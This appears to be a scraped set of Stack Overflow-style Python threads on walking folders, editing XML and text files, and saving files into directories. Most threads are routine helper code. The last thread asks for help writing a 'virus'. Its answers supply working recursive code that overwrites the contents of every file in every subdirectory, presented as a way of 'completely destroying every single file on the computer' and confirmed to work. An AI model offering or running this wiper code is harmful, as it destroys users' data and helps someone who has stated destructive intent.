Searching a folder structure and modifying XML files using Python

I am trying to create a Python script that will iterate through a folder structure, find folders named 'bravo', and modify the XML files contained within them.
In the XML files, I want to modify the 'location' attribute of a tag called 'file', such as:
<file location="e:\one\two"/>
I just need to change the drive letter of the file path from 'e' to 'f', so that it will read:
<file location="f:\one\two"/>
However...
The names of these XML files are unique, so I cannot search for an exact file name. Instead I am searching by file type.
Also, there are other XML files in my folder structure, without the 'file' tag, that I wish to ignore.
The only constant is that the XML files I want to modify are all stored in folders named 'bravo'.
I also wish to create a log file that lists all the XML files (with their file paths) that have been updated successfully, and preferably the ones that failed.
Using answers to similar questions on this site, I have cobbled together the following script.
In its current state, the script tries to modify every XML file it finds. I have not been able to add code that restricts the search to folders called 'bravo'.
When the script modifies an XML file that is not in a 'bravo' folder, it raises an error because these files do not contain a 'file' tag.
Could someone please help me correct my script (or create a new one)?
Here is an example of the folder structure...
[Image: My folder structure]
And my script so far...
from xml.dom import minidom
import os
# enter the directory where to start search for xml files...
for root, dirs, files in os.walk("c:/temp"):
    for file in files:
        # search for xml files...
        if file.endswith(".xml"):
            xml_file = file
            xmldoc = minidom.parse(os.path.join(root, xml_file))
            # in the xml file look for tag called "file"...
            file_location = xmldoc.getElementsByTagName("file")
            # i don't understand the next line of code, but it's needed
            file_location = file_location[0]
            # 'location_string' is a variable for the 'location' path of the file tag in the xml document
            location_string = (file_location.attributes["location"].value)
            # the new drive letter is added to the location_string to create 'new_location'
            new_location = "f" + location_string[1:]
            # replace the 'location' value of the file tag with the new location...
            file_location.attributes["location"].value = new_location
            # write the change to the original file
            with open((os.path.join(root, xml_file)),'w') as f:
                f.write(xmldoc.toxml())
            print("%s has been updated!" % (os.path.join(root, xml_file)))
            # add updated file name to log...
            log_file = open("filepath_update_log.txt", "a")
            log_file.write("%s\n" % (os.path.join(root, xml_file)))
            log_file.close()

Test whether the directory name matches before your second loop (the one over the files). To do that, you first have to get the last directory in the path, as described in "How to get only the last part of a path in Python?":
if os.path.basename(os.path.normpath(root)) == "bravo":
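To show where that test could sit inside the walk, here is a minimal sketch. The function name xml_files_in_named_folders and its parameters are made up for illustration; only os.walk, os.path.basename and os.path.normpath come from the question and the line above.

```python
import os


def xml_files_in_named_folders(start_dir, folder_name="bravo"):
    """Return the paths of .xml files that sit directly inside folders
    called `folder_name`, anywhere below `start_dir`.

    Hypothetical helper: the name and signature are assumptions.
    """
    matches = []
    for root, dirs, files in os.walk(start_dir):
        # Skip every directory whose last path component is not the wanted name.
        if os.path.basename(os.path.normpath(root)) != folder_name:
            continue
        for name in files:
            if name.lower().endswith(".xml"):
                matches.append(os.path.join(root, name))
    return matches
```

With the question's layout this would be called as xml_files_in_named_folders("c:/temp"). XML files in other folders are never opened, so the missing 'file' tag can no longer cause an error there.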
You could use the logging module (https://docs.python.org/3/library/logging.html) to write the log file.
If you only want to replace a single letter, you may be able to replace it directly in the file's text instead of parsing the XML, as suggested in https://stackoverflow.com/a/17548459/7062162:
def inplace_change(filename, old_string, new_string):
    # Safely read the input filename using 'with'
    with open(filename) as f:
        s = f.read()
        if old_string not in s:
            print('"{old_string}" not found in {filename}.'.format(**locals()))
            return
    # Safely write the changed content, if found in the file
    with open(filename, 'w') as f:
        print('Changing "{old_string}" to "{new_string}" in {filename}'.format(**locals()))
        s = s.replace(old_string, new_string)
        f.write(s)
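If you would rather keep the minidom approach from the question, the following is a rough sketch (Python 3) of how the update and the logging could fit together. The names update_file_locations and update_and_log, the logger name, and the UPDATED/SKIPPED/FAILED wording are all assumptions made for illustration. It takes a list of XML paths, changes only 'location' values that start with the old drive letter, and records each outcome in the log file.

```python
import logging
from xml.dom import minidom
from xml.parsers.expat import ExpatError


def update_file_locations(xml_path, old_drive="e", new_drive="f"):
    """Change the drive letter in every <file location="..."> of one XML file.

    Returns the number of attributes changed (0 if nothing matched).
    Hypothetical helper: name and parameters are assumptions.
    """
    doc = minidom.parse(xml_path)
    changed = 0
    for element in doc.getElementsByTagName("file"):
        location = element.getAttribute("location")  # "" if the attribute is missing
        if location[:2].lower() == old_drive.lower() + ":":
            element.setAttribute("location", new_drive + location[1:])
            changed += 1
    if changed:
        # Only rewrite files that actually changed.
        with open(xml_path, "w", encoding="utf-8") as f:
            f.write(doc.toxml())
    return changed


def update_and_log(xml_paths, log_path="filepath_update_log.txt"):
    """Run update_file_locations on each path and log the outcome."""
    logger = logging.getLogger("drive_letter_update")  # assumed logger name
    logger.setLevel(logging.INFO)
    handler = logging.FileHandler(log_path)
    logger.addHandler(handler)
    try:
        for path in xml_paths:
            try:
                count = update_file_locations(path)
            except (OSError, ExpatError) as exc:
                logger.error("FAILED %s (%s)", path, exc)
                continue
            if count:
                logger.info("UPDATED %s", path)
            else:
                logger.info("SKIPPED %s", path)
    finally:
        logger.removeHandler(handler)
        handler.close()
```

Files without a 'file' tag are logged as skipped rather than raising an IndexError, and unreadable or malformed files are logged as failed instead of stopping the run.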

Related

Python: Iterate through directory to find specific text file, open it, write some of its contents to a new file, close it, and move on to the next dir

I have a script that takes an input text file, finds data in it and stores that data in variables, which I later use to write to a new file. This snippet of code only reads the txt file and stores the data from it in variables.
import re
searchfile = open('C://Users//Me//DynamicFolder//report//summary.txt','r', encoding='utf-8')
slab_count=0
slab_number=[]
slab_total=0
for line in searchfile:
    if "Slab" in line:
        slab_num = ([float(s) for s in re.findall(r'[-+]?(?:\d*\.\d+|\d+)', line)])
        slab_percent = slab_num[-1]
        slab_number.append(slab_percent)
        slab_count=slab_count+1
slab_total=0
for slab_percent in slab_number:
    slab_total+=slab_percent
searchfile.close()
I am using xlsxwriter to write the variables to an Excel document.
My question is: how do I run this over every summary.txt found in the subdirectories of a given directory, when the folder names are dynamic?
So C://Users//Me//DynamicFolder//report//summary.txt is the path to one of the files. There are several folders, which I have called DynamicFolder here, that are created by another process, and their names change all the time. I need this script to go into each of those dynamic folders and then into a subdirectory called report, whose name is static and always the same. So each dynamic folder has a subdirectory called report, and the report folder contains a file called summary.txt. I am trying to go through each dynamic folder into report > summary.txt, then open those txt files and write out data from them.
How do I iterate or loop over this? Right now I have 18 folders with those DynamicFolder names, which will change when they are overwritten. How can I make this snippet of code iterate through them?
for path in Path('C://Users//Me//DynamicFolder//report//summary.txt').rglob('summary.txt'):
The report folder is not the only folder with a summary.txt file, but it's the only folder with the file I want. The code above pulls ALL summary.txt files from all subdirectories under the DynamicFolder (not just the report folder). I am wondering whether I can make this look ONLY in the 'report' subdirectories under the dynamic folders, and somehow use it to iterate the rest of my code.
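One possible direction, offered only as a sketch: pathlib's glob accepts a pattern with a wildcard for the changing folder name, so "*/report/summary.txt" matches only the summary.txt files that sit in a report folder directly under each dynamic folder. This assumes the dynamic folders all live in one parent directory (for example C:/Users/Me). The function names find_report_summaries and slab_total are invented here, and the parsing simply mirrors the regular expression from the snippet above.

```python
import re
from pathlib import Path

# Same number pattern as in the question's snippet.
NUMBER = re.compile(r"[-+]?(?:\d*\.\d+|\d+)")


def find_report_summaries(base_dir):
    """Return every <base_dir>/<any folder>/report/summary.txt, sorted by path.

    Hypothetical helper; `base_dir` is assumed to be the parent of the
    dynamically named folders.
    """
    return sorted(Path(base_dir).glob("*/report/summary.txt"))


def slab_total(summary_path):
    """Sum the last number found on each line that contains 'Slab'."""
    total = 0.0
    with open(summary_path, "r", encoding="utf-8") as searchfile:
        for line in searchfile:
            if "Slab" in line:
                numbers = NUMBER.findall(line)
                if numbers:
                    total += float(numbers[-1])
    return total
```

The rest of the processing can then run in a loop such as: for path in find_report_summaries("C:/Users/Me"): total = slab_total(path). Each result can be written to the Excel document from inside that loop.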

Modify all files in specified directory (including subfolders) and saving them in new directory while preserving folder structure (Python)

(I'm new to Python, so please excuse the probably trivial question. I tried my best to look for similar issues but, surprisingly, couldn't find anyone with the same question.)
I'm trying to build a simple static site generator in Python. The script should take all .txt files in a specific directory (including subfolders), paste the content of each into a template .html file and then save all the newly generated .html files into a new directory while recreating the folder structure of the original directory.
So far I have code that does the conversion for a single file, but I'm unsure how to do it for multiple files in a directory.
with open('template/page.html', 'r') as template:
    templatedata = template.read()
with open('content/content.txt', 'r') as content:
    contentdata = content.read()
pagedata = templatedata.replace('!PlaceholderContent!', contentdata)
with open('www/content.html', 'w') as output:
    output.write(pagedata)

To manipulate files and directories, you will need to import some system functionality from the built-in os module.
import os
The functionality in the os module includes:
Listing the content of a directory :
path_to_template_dir = 'template/'
template_files = os.listdir(path_to_template_dir)
print(template_files)
# Outputs : ['page.html']
Creating a directory (if it does not already exist) :
path_to_output_dir = 'www/'
try:
    os.mkdir(path_to_output_dir)
except FileExistsError as e:
    print('Directory exists:', path_to_output_dir)
Since you know the names of the directories you want to use, and these two functions give you the names of the files you want to read and generate, you can concatenate each file name to the name of its directory to build the string (str) of the final file path, which you can then open() for reading and/or writing.
It's hard to give a perfect code example for your question, since the logic of how you want to manipulate each template and content file is missing, but here is an example of writing a file inside the newly created directory:
path_to_output_file = path_to_output_dir + 'content.html'
with open(path_to_output_file, 'w') as output:
    output.write('Content')
And an example for reading all the template files inside the template/ directory and then printing them to the screen.
for template_file in template_files:
    path_to_template_file = path_to_template_dir + template_file
    with open(path_to_template_file, 'r') as template:
        print(template.read())
In the end, manipulating files is all about building the path string you want to read from or write to, and then accessing it.
Any other functionality you might need (for example, checking whether a path is a file with os.path.isfile() or a directory with os.path.isdir()) can be found in the os module.
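Putting these pieces together for the original question, here is a minimal sketch that walks the content directory (subfolders included) and mirrors its structure in the output directory. It uses os.walk and os.makedirs rather than the os.listdir and os.mkdir calls shown above, because they handle nested folders directly. The function name build_site and its parameters are assumptions; the placeholder string and directory names come from the question.

```python
import os


def build_site(content_dir, template_path, output_dir,
               placeholder="!PlaceholderContent!"):
    """Render every .txt file under `content_dir` into an .html file under
    `output_dir`, recreating the same subfolder layout.

    Hypothetical helper: the name and signature are assumptions.
    Returns the list of files written.
    """
    with open(template_path, "r", encoding="utf-8") as template:
        templatedata = template.read()

    written = []
    for root, dirs, files in os.walk(content_dir):
        # Path of the current folder relative to the content root ("." at the top).
        relative = os.path.relpath(root, content_dir)
        target_dir = os.path.normpath(os.path.join(output_dir, relative))
        os.makedirs(target_dir, exist_ok=True)
        for name in files:
            if not name.endswith(".txt"):
                continue
            with open(os.path.join(root, name), "r", encoding="utf-8") as content:
                contentdata = content.read()
            html_name = os.path.splitext(name)[0] + ".html"
            out_path = os.path.join(target_dir, html_name)
            with open(out_path, "w", encoding="utf-8") as output:
                output.write(templatedata.replace(placeholder, contentdata))
            written.append(out_path)
    return written
```

For the layout in the question this would be called as build_site('content', 'template/page.html', 'www').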

Write multiple text files to the directory in Python

I am working on saving text to different files. I have already created several files, and each text file has some text/paragraphs in it. Now I just want to save these files to a directory. I have already created a directory of my own, but it is currently empty. I want to save these text files into that directory.
The partial code is below:
for doc in root:
    docID = doc.find('DOCID').text.strip()
    text = doc.find('TEXT').text.strip()
    f = open("%s" %docID, 'w')
    f.write(str(text))
Now I have created all the files with text in them, and I also have an empty folder/directory. I just don't know how to put these files into the directory.
I would appreciate any help.
========================================================================
[Solved] Thank you all for your help! I figured it out, so I am adding a summary here. I had a couple of problems:
1. My docID was saved as a tuple. I needed to convert it to a string without any extra symbols. Here is the reference I used: https://stackoverflow.com/a/17426417/9387211
2. I created a new path and wrote the text to it, using this method: https://stackoverflow.com/a/8024254/9387211
Here is my updated code, which works without problems. Thanks again, everyone!
for doc in root:
    docID = doc.find('DOCID').text.strip()
    did = ''.join(map(str,docID))
    text = doc.find('TEXT').text.strip()
    filename = os.path.join(dst_folder_path, did)
    with open(filename, 'w') as f:
        f.write(str(text))

Suppose you have all the text files in your home directory (~/) and you want to move them to the /path/to/folder directory.
from shutil import copyfile
import os
docid_list = ['docid-1', 'docid-2']
for did in docid_list:
    # copyfile needs the full destination file path, not just the folder
    copyfile(did, os.path.join('/path/to/folder', did))
    os.remove(did)
This copies the docid files into /path/to/folder and removes the originals from the home directory (assuming you run it from the home directory).

You can build the full file path and pass it to open, like this:
doc_file = open(<file path>, 'w')
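As a rough illustration of building that path, the sketch below joins the target folder and the document ID with os.path.join and writes the text straight into the folder, so nothing has to be moved afterwards. The function write_docs and the (doc_id, text) pairs are assumptions standing in for the values read from the XML in the question.

```python
import os


def write_docs(docs, dst_folder_path):
    """Write each (doc_id, text) pair to a file named doc_id inside
    `dst_folder_path`, creating the folder if needed.

    Hypothetical helper: `docs` stands in for the DOCID/TEXT values
    extracted in the question.
    """
    os.makedirs(dst_folder_path, exist_ok=True)
    written = []
    for doc_id, text in docs:
        filename = os.path.join(dst_folder_path, doc_id)
        with open(filename, "w", encoding="utf-8") as doc_file:
            doc_file.write(text)
        written.append(filename)
    return written
```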

Adding actual files to a list, instead of just the file's string name

I am having issues reading the contents of the files I am trying to open due to the fact that python believes there is:
"No such file or directory: 'Filename.xrf'"
Here is an outline of my code and what I think the problem may be:
The user's input defines the path to where the files are.
direct = str(raw_input("Enter directory name where your data is: "))
path = "/Users/myname/Desktop/heasoft/XRF_data/%s/40_keV" \
    %(direct)
print os.listdir(path)
# This lists the correct contents of the directory that I wanted it to.
So here I essentially let the user decide which directory they want to manipulate and then I choose one more directory path named "40_keV".
Within a defined function I use the OS module to navigate to the corresponding directory and then append every file within the 40_keV directory to a list, named dataFiles.
def Spectrumdivide():
    dataFiles = []
    for root, dirs, files in os.walk(path):
        for file in files:
            if file.endswith('.xrf'):
                dataFiles.append(file)
Here, the correct files were appended to the list 'dataFiles', but I think this may be where the problem is occurring. I'm not sure whether or not Python is adding the NAME of the file to my list instead of the actual file object.
The code breaks because python believes there is no such file or directory.
for filename in dataFiles:
    print filename
    f = open(filename,'r') # <- THE CODE BREAKS HERE
    print "Opening file: " + filename
    line_num = f.readlines()
Again, the correct file is printed from dataFiles[0] in the first iteration of the loop but then this common error is produced:
IOError: [Errno 2] No such file or directory: '40keV_1.xrf'
I'm using an Anaconda launcher to run Spyder (Python 2.7), and the files are text files containing two columns of equal length. The goal is to assign each column to a list and then manipulate them accordingly.

os.walk gives you bare file names, so open() looks for them in the current working directory and fails. Append the full path, not just the file's name, by joining it with root using os.path.join:
for root, dirs, files in os.walk(path):
    for file in files:
        if file.endswith('.xrf'):
            dataFiles.append(os.path.join(root, file))
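For completeness, a sketch of the whole flow, written for Python 3 rather than the Python 2.7 used in the question. The helper names collect_files and read_two_columns are invented, and the parsing assumes the two columns are whitespace-separated numbers, which the question does not state.

```python
import os


def collect_files(path, suffix=".xrf"):
    """Return the full paths of all files below `path` ending in `suffix`."""
    data_files = []
    for root, dirs, files in os.walk(path):
        for name in files:
            if name.endswith(suffix):
                # Join with root so the path can be opened from any working directory.
                data_files.append(os.path.join(root, name))
    return data_files


def read_two_columns(filename):
    """Read a two-column text file into two lists of floats.

    Assumes whitespace-separated numeric columns; lines with fewer than
    two fields are skipped.
    """
    first, second = [], []
    with open(filename, "r") as f:
        for line in f:
            parts = line.split()
            if len(parts) < 2:
                continue
            first.append(float(parts[0]))
            second.append(float(parts[1]))
    return first, second
```

Because each entry in the list is now a full path, open() no longer depends on which directory the script is run from.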

Listing Directories In Python Multi Line

i need help trying to list directories in python, i am trying to code a python virus, just proof of concept, nothing special.
#!/usr/bin/python
import os, sys
VIRUS=''
data=str(os.listdir('.'))
data=data.translate(None, "[],\n'")
print data
f = open(data, "w")
f.write(VIRUS)
f.close()
EDIT: I need it to be multi-lined so when I list the directorys I can infect the first file that is listed then the second and so on.
I don't want to use the ls command cause I want it to be multi-platform.

Don't call str on the result of os.listdir if you're just going to try to parse it again. Instead, use the result directly:
for item in os.listdir('.'):
    print item # or do something else with item

So when writing a virus like this, you will want it to be recursive. This way it will be able to go inside every directory it finds and write over those files as well, completely destroying every single file on the computer.
def virus(directory=os.getcwd()):
VIRUS = "THIS FILE IS NOW INFECTED"
if directory[-1] == "/": #making sure directory can be concencated with file
pass
else:
directory = directory + "/" #making sure directory can be concencated with file
files = os.listdir(directory)
for i in files:
location = directory + i
if os.path.isfile(location):
with open(location,'w') as f:
f.write(VIRUS)
elif os.path.isdir(location):
virus(directory=location) #running function again if in a directory to go inside those files
Now this one line will rewrite all files as the message in the variable VIRUS:
virus()
Extra explanation:
the reason I have the default as: directory=os.getcwd() is because you originally were using ".", which, in the listdir method, will be the current working directories files. I needed the name of the directory on file in order to pull the nested directories
This does work!:
I ran it in a test directory on my computer and every file in every nested directory had it's content replaced with: "THIS FILE IS NOW INFECTED"

Something like this:
import os
VIRUS = "some text"
data = os.listdir(".") #returns a list of files and directories
for x in data: #iterate over the list
if os.path.isfile(x): #if current item is a file then perform write operation
#use `with` statement for handling files, it automatically closes the file
with open(x,'w') as f:
f.write(VIRUS)
